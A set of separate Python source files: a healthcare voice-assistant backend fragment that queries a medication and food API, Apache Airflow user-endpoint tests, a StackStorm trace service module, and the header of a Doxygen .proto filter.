medication_msg = 'You have no medication to take.'
elif status == 'Connection Error':
#medication_msg = "You have 2 medications to take. Medication 1:. 1 tablet Panadol after meal. do not eat before meal. Medication 2:. 2 tablets Lasix at 03:10 PM."
medication_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Error')
elif status == 'Connection Timeout':
#medication_msg = "You have 2 medications to take. Medication 1:. 1 tablet Panadol after meal. do not eat before meal. Medication 2:. 2 tablets Lasix at 03:10 PM."
medication_msg = "Sorry we are experiencing technical difficulties retrieving data. Please check back later."
rootLogger.error('PICA connection Timeout')
else:
medication_msg = 'Error in Medication function'
#medication_msg = "You have 2 medications to take. Medication 1:. 1 tablet Panadol after meal. do not eat before meal. Medication 2:. 2 tablets Lasix at 03:10 PM."
rootLogger.info("Get medication complete")
rootLogger.debug(medication_msg)
return medication_msg, status
def get_food_msg(msg_info,time_frame):
rootLogger.info('Getting Food')
'''
if not msg_info["Device ID"]:
param = { 'db_name': 'devdb',
'table_name': 'food',
'time_frame': time_frame,
'user_id': 'user1'
}
'''
param = { 'db_name': 'food',
'time_frame': time_frame,
'user_id': msg_info["Device ID"]
}
foodlist, status = get_info_from_PICA(param)
if status == 'success':
if foodlist:
food_msglist = []
food_msglist.append('Please eat')
food_msglist2 = []
for idx, food in enumerate(foodlist):
if food['foodtype']:
food_msglist2.append(food['foodtype'])
if food['frequency']:
food_msglist2.append(food['frequency'])
food_msglist.append(' '.join(food_msglist2))
else:
food_msglist = 'Eat whatever you like.'
# appointment_msg='Your current schedules are {}'.format(appointment_msgstr)
food_msg = ' '.join(food_msglist)
elif status == 'Connection Error':
food_msg = 'PICA food API is down'
elif status == 'Connection Timeout':
food_msg = "PICA Appointment API Timed out. " \
"Please eat Breakfast everyday"
else:
food_msg = 'Error in food function'
#food_msg = "If you are not very hungry, you can have hot milo or porridge"
rootLogger.info('Get food complete')
rootLogger.debug(food_msg)
return food_msg, status
def get_help_msg(msg_info):
rootLogger.info('Getting help')
#contact requested resource.
source_msg = 'PICA'
status = push_info_to_PICA(source_msg, msg_info["Request Timestamp"])
if status:
help_msg = ' '.join(['Contacted', source_msg, 'for help'])
rootLogger.info('Get help complete')
status = 'success'
else:
help_msg = 'Send help API is down'
status = 'Connection Timeout'
#help_msg = 'Okay, Help is on its way'
#do follow up action like send sms instead.
rootLogger.info('Get help failed')
rootLogger.debug(help_msg)
return help_msg, status
def get_info_from_PICA(param):
# retrieve data from PICA
# build object to be sent. redundant?
# data_to_send = { 'Alexa_id' : param['user_id'],
# 'date_range' : param['time_frame']
# }
#url = '/'.join([pica_url,param['db_name'], param['time_frame']['date_start'], param['time_frame']['date_end'], param['user_id']])
url = '/'.join([pica_url,param['db_name']])
data_to_send = {'alexa_id': param['user_id'],
'startDate' : param['time_frame']['date_start'],
'endDate': param['time_frame']['date_end']}
#rootLogger.debug(url)
# Send request to PICA
# try:
# r = requests.post('http://httpbin.org/post', data = {'key':'value'})
try:
# pica_response = requests.get(url, timeout=2)
pica_response = requests.get(url, params=data_to_send, timeout=2)
pica_response.raise_for_status()
except requests.exceptions.HTTPError as e:
status = e.__str__()
data_retrieved = ''
rootLogger.debug(e)
except requests.exceptions.ConnectionError as e:
rootLogger.debug("Error Connecting:")
status = 'Connection Error'
data_retrieved = ''
except requests.exceptions.Timeout as e:
rootLogger.debug("Timeout Error:" )
status = 'Connection Timeout'
data_retrieved = ''
except requests.exceptions.RequestException as e:
# catastrophic error. bail.
data_retrieved = ''
status = 'Unknown error'
rootLogger.debug(e)
else:
data_retrieved = pica_response.json()
status = 'success'
# parse return data from PICA
# iso8601.parse_date()
# time of the appointment
# type of service (e.g. meal service)
# assigned healthcare worker
# comments (this is optional e.g. assigned careworker will be running late)
# data_recieved = r.json()
return data_retrieved, status
def push_info_to_PICA(source, param):
# Send request to PICA
# r = requests.post('http://httpbin.org/post', data = {'key':'value'})
# r = RQ.post(url, json = data_to_send)
# parse return data from PICA
# assigned healthcare worker
# comments (this is optional e.g. assigned careworker will be running late)
# data_recieved = r.json()
#data_recieved = data_to_send
status = False
return status
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest.mock
import pytest
from flask_appbuilder.security.sqla.models import User
from parameterized import parameterized
from sqlalchemy.sql.functions import count
from airflow.api_connexion.exceptions import EXCEPTIONS_LINK_MAP
from airflow.security import permissions
from airflow.utils import timezone
from airflow.utils.session import create_session
from tests.test_utils.api_connexion_utils import assert_401, create_user, delete_user
from tests.test_utils.config import conf_vars
DEFAULT_TIME = "2020-06-11T18:00:00+00:00"
@pytest.fixture(scope="module")
def configured_app(minimal_app_for_api):
app = minimal_app_for_api
create_user(
app, # type: ignore
username="test",
role_name="Test",
permissions=[
(permissions.ACTION_CAN_CREATE, permissions.RESOURCE_USER),
(permissions.ACTION_CAN_DELETE, permissions.RESOURCE_USER),
(permissions.ACTION_CAN_EDIT, permissions.RESOURCE_USER),
(permissions.ACTION_CAN_READ, permissions.RESOURCE_USER),
],
)
create_user(app, username="test_no_permissions", role_name="TestNoPermissions") # type: ignore
yield app
delete_user(app, username="test") # type: ignore
delete_user(app, username="test_no_permissions") # type: ignore
class TestUserEndpoint:
@pytest.fixture(autouse=True)
def setup_attrs(self, configured_app) -> None:
self.app = configured_app
self.client = self.app.test_client() # type:ignore
self.session = self.app.appbuilder.get_session
def teardown_method(self) -> None:
# Delete users that have our custom default time
users = self.session.query(User).filter(User.changed_on == timezone.parse(DEFAULT_TIME))
users.delete(synchronize_session=False)
self.session.commit()
def _create_users(self, count, roles=None):
# create users with defined created_on and changed_on date
# for easy testing
if roles is None:
roles = []
return [
User(
first_name=f'test{i}',
last_name=f'test{i}',
username=f'TEST_USER{i}',
email=f'mytest@test{i}.org',
roles=roles or [],
created_on=timezone.parse(DEFAULT_TIME),
changed_on=timezone.parse(DEFAULT_TIME),
)
for i in range(1, count + 1)
]
class TestGetUser(TestUserEndpoint):
def test_should_respond_200(self):
users = self._create_users(1)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users/TEST_USER1", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert response.json == {
'active': None,
'changed_on': DEFAULT_TIME,
'created_on': DEFAULT_TIME,
'email': 'mytest@test1.org',
'fail_login_count': None,
'first_name': 'test1',
'last_login': None,
'last_name': 'test1',
'login_count': None,
'roles': [],
'username': 'TEST_USER1',
}
def test_should_respond_404(self):
response = self.client.get("/api/v1/users/invalid-user", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 404
assert {
'detail': "The User with username `invalid-user` was not found",
'status': 404,
'title': 'User not found',
'type': EXCEPTIONS_LINK_MAP[404],
} == response.json
def test_should_raises_401_unauthenticated(self):
response = self.client.get("/api/v1/users/TEST_USER1")
assert_401(response)
def test_should_raise_403_forbidden(self):
response = self.client.get(
"/api/v1/users/TEST_USER1", environ_overrides={'REMOTE_USER': "test_no_permissions"}
)
assert response.status_code == 403
class TestGetUsers(TestUserEndpoint):
def test_should_response_200(self):
response = self.client.get("/api/v1/users", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert response.json["total_entries"] == 2
usernames = [user["username"] for user in response.json["users"] if user]
assert usernames == ['test', 'test_no_permissions']
def test_should_raises_401_unauthenticated(self):
response = self.client.get("/api/v1/users")
assert_401(response)
def test_should_raise_403_forbidden(self):
response = self.client.get("/api/v1/users", environ_overrides={'REMOTE_USER': "test_no_permissions"})
assert response.status_code == 403
class TestGetUsersPagination(TestUserEndpoint):
@parameterized.expand(
[
("/api/v1/users?limit=1", ["test"]),
("/api/v1/users?limit=2", ["test", "test_no_permissions"]),
(
"/api/v1/users?offset=5",
[
"TEST_USER4",
"TEST_USER5",
"TEST_USER6",
"TEST_USER7",
"TEST_USER8",
"TEST_USER9",
"TEST_USER10",
],
),
(
"/api/v1/users?offset=0",
[
"test",
"test_no_permissions",
"TEST_USER1",
"TEST_USER2",
"TEST_USER3",
"TEST_USER4",
"TEST_USER5",
"TEST_USER6",
"TEST_USER7",
"TEST_USER8",
"TEST_USER9",
"TEST_USER10",
],
),
("/api/v1/users?limit=1&offset=5", ["TEST_USER4"]),
("/api/v1/users?limit=1&offset=1", ["test_no_permissions"]),
(
"/api/v1/users?limit=2&offset=2",
["TEST_USER1", "TEST_USER2"],
),
]
)
def test_handle_limit_offset(self, url, expected_usernames):
users = self._create_users(10)
self.session.add_all(users)
self.session.commit()
response = self.client.get(url, environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert response.json["total_entries"] == 12
usernames = [user["username"] for user in response.json["users"] if user]
assert usernames == expected_usernames
def test_should_respect_page_size_limit_default(self):
users = self._create_users(200)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
# Explicitly add the 2 users on setUp
assert response.json["total_entries"] == 200 + len(['test', 'test_no_permissions'])
assert len(response.json["users"]) == 100
def test_should_response_400_with_invalid_order_by(self):
users = self._create_users(2)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users?order_by=myname", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 400
msg = "Ordering with 'myname' is disallowed or the attribute does not exist on the model"
assert response.json['detail'] == msg
def test_limit_of_zero_should_return_default(self):
users = self._create_users(200)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users?limit=0", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
# Explicit add the 2 users on setUp
assert response.json["total_entries"] == 200 + len(['test', 'test_no_permissions'])
assert len(response.json["users"]) == 100
@conf_vars({("api", "maximum_page_limit"): "150"})
def test_should_return_conf_max_if_req_max_above_conf(self):
users = self._create_users(200)
self.session.add_all(users)
self.session.commit()
response = self.client.get("/api/v1/users?limit=180", environ_overrides={'REMOTE_USER': "test"})
assert response.status_code == 200
assert len(response.json['users']) == 150
EXAMPLE_USER_NAME = "example_user"
def _delete_example_user():
with create_session() as session:
user = session.query(User).filter(User.username == EXAMPLE_USER_NAME).first()
if user is None:
return
user.roles = []
session.delete(user)
@pytest.fixture()
def autoclean_username():
_delete_example_user()
yield EXAMPLE_USER_NAME
_delete_example_user()
@pytest.fixture()
def autoclean_user_payload(autoclean_username):
return {
"username": autoclean_username,
"password": "resutsop",
"email": "test@example.com",
"first_name": "Example",
"last_name": "User",
}
@pytest.fixture()
def autoclean_admin_user(configured_app, autoclean_user_payload):
security_manager = configured_app.appbuilder.sm
return security_manager.add_user(
role=security_manager.find_role("Admin"),
**autoclean_user_payload,
)
class TestPostUser(TestUserEndpoint):
def test_with_default_role(self, autoclean_username, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
security_manager = self.app.appbuilder.sm
user = security_manager.find_user(autoclean_username)
assert user is not None
assert user.roles == [security_manager.find_role("Public")]
def test_with_custom_roles(self, autoclean_username, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json={"roles": [{"name": "User"}, {"name": "Viewer"}], **autoclean_user_payload},
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
security_manager = self.app.appbuilder.sm
user = security_manager.find_user(autoclean_username)
assert user is not None
assert {r.name for r in user.roles} == {"User", "Viewer"}
def test_unauthenticated(self, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
)
assert response.status_code == 401, response.json
def test_forbidden(self, autoclean_user_payload):
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test_no_permissions"},
)
assert response.status_code == 403, response.json
def test_already_exists(self, autoclean_username, autoclean_user_payload):
create_user(self.app, username=autoclean_username, role_name="TestNoPermissions")
response = self.client.post(
"/api/v1/users",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 409, response.json
@pytest.mark.parametrize(
"payload_converter, error_message",
[
pytest.param(
lambda p: {k: v for k, v in p.items() if k != "username"},
"{'username': ['Missing data for required field.']}",
id="missing-required",
),
pytest.param(
lambda p: {"i-am": "a typo", **p},
"{'i-am': ['Unknown field.']}",
id="unknown-user-field",
),
pytest.param(
lambda p: {**p, "roles": [{"also": "a typo", "name": "User"}]},
"{'roles': {0: {'also': ['Unknown field.']}}}",
id="unknown-role-field",
),
pytest.param(
lambda p: {**p, "roles": [{"name": "God"}, {"name": "User"}, {"name": "Overlord"}]},
"Unknown roles: 'God', 'Overlord'",
id="unknown-role",
),
],
)
def test_invalid_payload(self, autoclean_user_payload, payload_converter, error_message):
response = self.client.post(
"/api/v1/users",
json=payload_converter(autoclean_user_payload),
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 400, response.json
assert response.json == {
'detail': error_message,
'status': 400,
'title': "Bad Request",
'type': EXCEPTIONS_LINK_MAP[400],
}
class TestPatchUser(TestUserEndpoint):
@pytest.mark.usefixtures("autoclean_admin_user")
def test_change(self, autoclean_username, autoclean_user_payload):
autoclean_user_payload["first_name"] = "Changed"
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
# The first name is changed.
data = response.json
assert data["first_name"] == "Changed"
assert data["last_name"] == "User"
@pytest.mark.usefixtures("autoclean_admin_user")
def test_change_with_update_maek(self, autoclean_username, autoclean_user_payload):
autoclean_user_payload["first_name"] = "Changed"
autoclean_user_payload["last_name"] = "Overlord"
response = self.client.patch(
f"/api/v1/users/{autoclean_username}?update_mask=first_name",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
# The first name is changed, but the last name isn't since we masked it.
data = response.json
assert data["first_name"] == "Changed"
assert data["last_name"] == "User"
@pytest.mark.usefixtures("autoclean_admin_user")
@unittest.mock.patch(
"airflow.api_connexion.endpoints.user_endpoint.generate_password_hash",
return_value="fake-hashed-pass",
)
def test_password_hashed(
self,
mock_generate_password_hash,
autoclean_username,
autoclean_user_payload,
):
autoclean_user_payload["password"] = "new-pass"
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
assert "password" not in response.json
mock_generate_password_hash.assert_called_once_with("new-pass")
password_in_db = (
self.session.query(User.password).filter(User.username == autoclean_username).scalar()
)
assert password_in_db == "fake-hashed-pass"
@pytest.mark.usefixtures("autoclean_admin_user")
def test_replace_roles(self, autoclean_username, autoclean_user_payload):
# Patching a user's roles should replace the entire list.
autoclean_user_payload["roles"] = [{"name": "User"}, {"name": "Viewer"}]
response = self.client.patch(
f"/api/v1/users/{autoclean_username}?update_mask=roles",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
assert {d["name"] for d in response.json["roles"]} == {"User", "Viewer"}
@pytest.mark.usefixtures("autoclean_admin_user")
def test_unchanged(self, autoclean_username, autoclean_user_payload):
# Should allow a PATCH that changes nothing.
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 200, response.json
expected = {k: v for k, v in autoclean_user_payload.items() if k != "password"}
assert {k: response.json[k] for k in expected} == expected
@pytest.mark.usefixtures("autoclean_admin_user")
def test_unauthenticated(self, autoclean_username, autoclean_user_payload):
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
)
assert response.status_code == 401, response.json
@pytest.mark.usefixtures("autoclean_admin_user")
def test_forbidden(self, autoclean_username, autoclean_user_payload):
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test_no_permissions"},
)
assert response.status_code == 403, response.json
def test_not_found(self, autoclean_username, autoclean_user_payload):
# This test does not populate autoclean_admin_user into the database.
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=autoclean_user_payload,
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 404, response.json
@pytest.mark.parametrize(
"payload_converter, error_message",
[
pytest.param(
lambda p: {k: v for k, v in p.items() if k != "username"},
"{'username': ['Missing data for required field.']}",
id="missing-required",
),
pytest.param(
lambda p: {"i-am": "a typo", **p},
"{'i-am': ['Unknown field.']}",
id="unknown-user-field",
),
pytest.param(
lambda p: {**p, "roles": [{"also": "a typo", "name": "User"}]},
"{'roles': {0: {'also': ['Unknown field.']}}}",
id="unknown-role-field",
),
pytest.param(
lambda p: {**p, "roles": [{"name": "God"}, {"name": "User"}, {"name": "Overlord"}]},
"Unknown roles: 'God', 'Overlord'",
id="unknown-role",
),
],
)
@pytest.mark.usefixtures("autoclean_admin_user")
def test_invalid_payload(
self,
autoclean_username,
autoclean_user_payload,
payload_converter,
error_message,
):
response = self.client.patch(
f"/api/v1/users/{autoclean_username}",
json=payload_converter(autoclean_user_payload),
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 400, response.json
assert response.json == {
'detail': error_message,
'status': 400,
'title': "Bad Request",
'type': EXCEPTIONS_LINK_MAP[400],
}
class TestDeleteUser(TestUserEndpoint):
@pytest.mark.usefixtures("autoclean_admin_user")
def test_delete(self, autoclean_username):
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 204, response.json # NO CONTENT.
assert self.session.query(count(User.id)).filter(User.username == autoclean_username).scalar() == 0
@pytest.mark.usefixtures("autoclean_admin_user")
def test_unauthenticated(self, autoclean_username):
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
)
assert response.status_code == 401, response.json
assert self.session.query(count(User.id)).filter(User.username == autoclean_username).scalar() == 1
@pytest.mark.usefixtures("autoclean_admin_user")
def test_forbidden(self, autoclean_username):
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
environ_overrides={"REMOTE_USER": "test_no_permissions"},
)
assert response.status_code == 403, response.json
assert self.session.query(count(User.id)).filter(User.username == autoclean_username).scalar() == 1
def test_not_found(self, autoclean_username):
# This test does not populate autoclean_admin_user into the database.
response = self.client.delete(
f"/api/v1/users/{autoclean_username}",
environ_overrides={"REMOTE_USER": "test"},
)
assert response.status_code == 404, response.json
|
|
# Copyright 2020 The StackStorm Authors.
# Copyright 2019 Extreme Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from mongoengine import ValidationError
from st2common import log as logging
from st2common.constants.triggers import ACTION_SENSOR_TRIGGER, NOTIFY_TRIGGER
from st2common.constants.trace import TRACE_CONTEXT
from st2common.exceptions.db import StackStormDBObjectNotFoundError
from st2common.exceptions.trace import UniqueTraceNotFoundException
from st2common.models.api.trace import TraceContext
from st2common.models.db.trace import TraceDB, TraceComponentDB
from st2common.models.system.common import ResourceReference
from st2common.persistence.execution import ActionExecution
from st2common.persistence.trace import Trace
from st2common.services import executions
import six
LOG = logging.getLogger(__name__)
__all__ = [
"get_trace_db_by_action_execution",
"get_trace_db_by_rule",
"get_trace_db_by_trigger_instance",
"get_trace",
"add_or_update_given_trace_context",
"add_or_update_given_trace_db",
"get_trace_component_for_action_execution",
"get_trace_component_for_rule",
"get_trace_component_for_trigger_instance",
]
ACTION_SENSOR_TRIGGER_REF = ResourceReference.to_string_reference(
pack=ACTION_SENSOR_TRIGGER["pack"], name=ACTION_SENSOR_TRIGGER["name"]
)
NOTIFY_TRIGGER_REF = ResourceReference.to_string_reference(
pack=NOTIFY_TRIGGER["pack"], name=NOTIFY_TRIGGER["name"]
)
def _get_valid_trace_context(trace_context):
"""
Check if tarce_context is a valid type and returns a TraceContext object.
"""
if not isinstance(trace_context, (TraceContext, dict)):
raise TypeError(
"The trace context has a value that is not a dictionary"
f" (was {type(trace_context)})."
)
# Pretty much abuse the dynamic nature of python to make it possible to support
# both dict and TraceContext types.
if isinstance(trace_context, dict):
trace_context = TraceContext(**trace_context)
return trace_context
def _get_single_trace_by_component(**component_filter):
"""
Tries to return a single Trace mathing component_filter. Raises an exception
when a filter matches multiple.
"""
traces = Trace.query(**component_filter)
if len(traces) == 0:
return None
elif len(traces) > 1:
raise UniqueTraceNotFoundException(
"More than 1 trace matching %s found." % component_filter
)
return traces[0]
def get_trace_db_by_action_execution(action_execution=None, action_execution_id=None):
if action_execution:
action_execution_id = str(action_execution.id)
return _get_single_trace_by_component(
action_executions__object_id=action_execution_id
)
def get_trace_db_by_rule(rule=None, rule_id=None):
if rule:
rule_id = str(rule.id)
# by rule could return multiple traces
return Trace.query(rules__object_id=rule_id)
def get_trace_db_by_trigger_instance(trigger_instance=None, trigger_instance_id=None):
if trigger_instance:
trigger_instance_id = str(trigger_instance.id)
return _get_single_trace_by_component(
trigger_instances__object_id=trigger_instance_id
)
def get_trace(trace_context, ignore_trace_tag=False):
"""
:param trace_context: context object using which a trace can be found.
:type trace_context: ``dict`` or ``TraceContext``
:param ignore_trace_tag: Even if a trace_tag is provided will be ignored.
:type ignore_trace_tag: ``str``
:rtype: ``TraceDB``
"""
trace_context = _get_valid_trace_context(trace_context)
if not trace_context.id_ and not trace_context.trace_tag:
raise ValueError("Atleast one of id_ or trace_tag should be specified.")
if trace_context.id_:
try:
return Trace.get_by_id(trace_context.id_)
except (ValidationError, ValueError):
LOG.warning(
'Database lookup for Trace with id="%s" failed.',
trace_context.id_,
exc_info=True,
)
raise StackStormDBObjectNotFoundError(
'Unable to find Trace with id="%s"' % trace_context.id_
)
if ignore_trace_tag:
return None
traces = Trace.query(trace_tag=trace_context.trace_tag)
# Assume this method only handles 1 trace.
if len(traces) > 1:
raise UniqueTraceNotFoundException(
"More than 1 Trace matching %s found." % trace_context.trace_tag
)
return traces[0]
def get_trace_db_by_live_action(liveaction):
"""
Given a liveaction does the best attempt to return a TraceDB.
1. From trace_context in liveaction.context
2. From parent in liveaction.context
3. From action_execution associated with provided liveaction
4. Creates a new TraceDB (which calling method is on the hook to persist).
:param liveaction: liveaction from which to figure out a TraceDB.
:type liveaction: ``LiveActionDB``
:returns: (boolean, TraceDB) if the TraceDB was created(but not saved to DB) or
retrieved from the DB and the TraceDB itself.
:rtype: ``tuple``
"""
trace_db = None
created = False
# 1. Try to get trace_db from liveaction context.
# via trigger_instance + rule or via user specified trace_context
trace_context = liveaction.context.get(TRACE_CONTEXT, None)
if trace_context:
trace_context = _get_valid_trace_context(trace_context)
trace_db = get_trace(trace_context=trace_context, ignore_trace_tag=True)
# found a trace_context but no trace_db. This implies a user supplied
# trace_tag so create a new trace_db
if not trace_db:
trace_db = TraceDB(trace_tag=trace_context.trace_tag)
created = True
return (created, trace_db)
# 2. If not found then check if parent context contains an execution_id.
# This cover case for child execution of a workflow.
parent_context = executions.get_parent_context(liveaction_db=liveaction)
if not trace_context and parent_context:
parent_execution_id = parent_context.get("execution_id", None)
if parent_execution_id:
# go straight to a trace_db. If there is a parent execution then that must
# be associated with a Trace.
trace_db = get_trace_db_by_action_execution(
action_execution_id=parent_execution_id
)
if not trace_db:
raise StackStormDBObjectNotFoundError(
"No trace found for execution %s" % parent_execution_id
)
return (created, trace_db)
# 3. Check if the action_execution associated with liveaction leads to a trace_db
execution = ActionExecution.get(liveaction__id=str(liveaction.id))
if execution:
trace_db = get_trace_db_by_action_execution(action_execution=execution)
# 4. No trace_db found, therefore create one. This typically happens
# when execution is run by hand.
if not trace_db:
trace_db = TraceDB(trace_tag="execution-%s" % str(liveaction.id))
created = True
return (created, trace_db)
def add_or_update_given_trace_context(
trace_context, action_executions=None, rules=None, trigger_instances=None
):
"""
Will update an existing Trace or add a new Trace. This method will only look for exact
Trace as identified by the trace_context. Even if the trace_context contain a trace_tag
it shall not be used to lookup a Trace.
* If an exact matching Trace is not found a new Trace is created
* Whenever only a trace_tag is supplied a new Trace is created.
:param trace_context: context object using which a trace can be found. If not found
trace_context.trace_tag is used to start new trace.
:type trace_context: ``dict`` or ``TraceContext``
:param action_executions: The action_execution to be added to the Trace. Should a list
of object_ids or a dict containing object_ids and caused_by.
:type action_executions: ``list``
:param rules: The rules to be added to the Trace. Should a list of object_ids or a dict
containing object_ids and caused_by.
:type rules: ``list``
:param trigger_instances: The trigger_instances to be added to the Trace. Should a list
of object_ids or a dict containing object_ids and caused_by.
:type trigger_instances: ``list``
:rtype: ``TraceDB``
"""
trace_db = get_trace(trace_context=trace_context, ignore_trace_tag=True)
if not trace_db:
# since trace_db is None need to end up with a valid trace_context
trace_context = _get_valid_trace_context(trace_context)
trace_db = TraceDB(trace_tag=trace_context.trace_tag)
return add_or_update_given_trace_db(
trace_db=trace_db,
action_executions=action_executions,
rules=rules,
trigger_instances=trigger_instances,
)
def add_or_update_given_trace_db(
trace_db, action_executions=None, rules=None, trigger_instances=None
):
"""
Will update an existing Trace.
:param trace_db: The TraceDB to update.
:type trace_db: ``TraceDB``
:param action_executions: The action_execution to be added to the Trace. Should a list
of object_ids or a dict containing object_ids and caused_by.
:type action_executions: ``list``
:param rules: The rules to be added to the Trace. Should a list of object_ids or a dict
containing object_ids and caused_by.
:type rules: ``list``
:param trigger_instances: The trigger_instances to be added to the Trace. Should a list
of object_ids or a dict containing object_ids and caused_by.
:type trigger_instances: ``list``
:rtype: ``TraceDB``
"""
if trace_db is None:
raise ValueError("trace_db should be non-None.")
if not action_executions:
action_executions = []
action_executions = [
_to_trace_component_db(component=action_execution)
for action_execution in action_executions
]
if not rules:
rules = []
rules = [_to_trace_component_db(component=rule) for rule in rules]
if not trigger_instances:
trigger_instances = []
trigger_instances = [
_to_trace_component_db(component=trigger_instance)
for trigger_instance in trigger_instances
]
# If an id exists then this is an update and we do not want to perform
# an upsert so use push_components which will use the push operator.
if trace_db.id:
return Trace.push_components(
trace_db,
action_executions=action_executions,
rules=rules,
trigger_instances=trigger_instances,
)
trace_db.action_executions = action_executions
trace_db.rules = rules
trace_db.trigger_instances = trigger_instances
return Trace.add_or_update(trace_db)
def get_trace_component_for_action_execution(action_execution_db, liveaction_db):
"""
Returns the trace_component compatible dict representation of an actionexecution.
:param action_execution_db: ActionExecution to translate
:type action_execution_db: ActionExecutionDB
:param liveaction_db: LiveAction corresponding to the supplied ActionExecution
:type liveaction_db: LiveActionDB
:rtype: ``dict``
"""
if not action_execution_db:
raise ValueError("action_execution_db expected.")
trace_component = {
"id": str(action_execution_db.id),
"ref": str(action_execution_db.action.get("ref", "")),
}
caused_by = {}
parent_context = executions.get_parent_context(liveaction_db=liveaction_db)
if liveaction_db and parent_context:
caused_by["type"] = "action_execution"
caused_by["id"] = liveaction_db.context["parent"].get("execution_id", None)
elif action_execution_db.rule and action_execution_db.trigger_instance:
# Once RuleEnforcement is available that can be used instead.
caused_by["type"] = "rule"
caused_by["id"] = "%s:%s" % (
action_execution_db.rule["id"],
action_execution_db.trigger_instance["id"],
)
trace_component["caused_by"] = caused_by
return trace_component
def get_trace_component_for_rule(rule_db, trigger_instance_db):
"""
Returns the trace_component compatible dict representation of a rule.
:param rule_db: The rule to translate
:type rule_db: RuleDB
:param trigger_instance_db: The TriggerInstance with causal relation to rule_db
:type trigger_instance_db: TriggerInstanceDB
:rtype: ``dict``
"""
trace_component = {}
trace_component = {"id": str(rule_db.id), "ref": rule_db.ref}
caused_by = {}
if trigger_instance_db:
# Once RuleEnforcement is available that can be used instead.
caused_by["type"] = "trigger_instance"
caused_by["id"] = str(trigger_instance_db.id)
trace_component["caused_by"] = caused_by
return trace_component
def get_trace_component_for_trigger_instance(trigger_instance_db):
"""
Returns the trace_component compatible dict representation of a triggerinstance.
:param trigger_instance_db: The TriggerInstance to translate
:type trigger_instance_db: TriggerInstanceDB
:rtype: ``dict``
"""
trace_component = {}
trace_component = {
"id": str(trigger_instance_db.id),
"ref": trigger_instance_db.trigger,
}
caused_by = {}
# Special handling for ACTION_SENSOR_TRIGGER and NOTIFY_TRIGGER where we
# know how to maintain the links.
if (
trigger_instance_db.trigger == ACTION_SENSOR_TRIGGER_REF
or trigger_instance_db.trigger == NOTIFY_TRIGGER_REF
):
caused_by["type"] = "action_execution"
# For both action trigger and notidy trigger execution_id is stored in the payload.
caused_by["id"] = trigger_instance_db.payload["execution_id"]
trace_component["caused_by"] = caused_by
return trace_component
def _to_trace_component_db(component):
"""
Take the component as string or a dict and will construct a TraceComponentDB.
:param component: Should identify the component. If a string should be id of the
component. If a dict should contain id and the caused_by.
:type component: ``bson.ObjectId`` or ``dict``
:rtype: ``TraceComponentDB``
"""
if not isinstance(component, (six.string_types, dict)):
print(type(component))
raise ValueError("Expected component to be str or dict")
object_id = (
component if isinstance(component, six.string_types) else component["id"]
)
ref = component.get("ref", "") if isinstance(component, dict) else ""
caused_by = component.get("caused_by", {}) if isinstance(component, dict) else {}
return TraceComponentDB(object_id=object_id, ref=ref, caused_by=caused_by)
|
|
#!/usr/bin/python3
##
# Doxygen filter for Google Protocol Buffers .proto files.
